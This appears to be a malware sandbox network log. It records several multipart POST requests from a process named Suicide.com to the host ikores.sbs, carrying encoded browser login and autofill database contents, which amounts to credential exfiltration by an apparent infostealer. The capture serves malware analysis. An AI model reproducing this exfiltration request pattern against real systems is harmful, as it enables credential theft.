                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:26 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    13192.168.2.4498725.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:25 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----USR1V37900ZM7Q1DTJW4
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 55081
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 56 33 37 39 30 30 5a 4d 37 51 31 44 54 4a 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------USR1V37900ZM7Q1DTJW4Content-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------USR1V37900ZM7Q1DTJW4Cont
                                                                                                                                                                                    2024-12-06 08:42:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:25 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:25 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:26 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    14192.168.2.4498785.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:27 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----58Y5FK6F37QIE37Q1NGL
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 142457
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------58Y5FK6F37QIE37Q1NGLCont
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                    Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:27 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:29 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    15192.168.2.4498795.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:28 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----58Y5FK6F37QIE37Q1NGL
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 493
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:28 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------58Y5FK6F37QIE37Q1NGLCont
                                                                                                                                                                                    2024-12-06 08:42:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:29 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    16192.168.2.4498905.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:32 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----LX4EUSR1N7QQIMGVASR9
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 169765
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
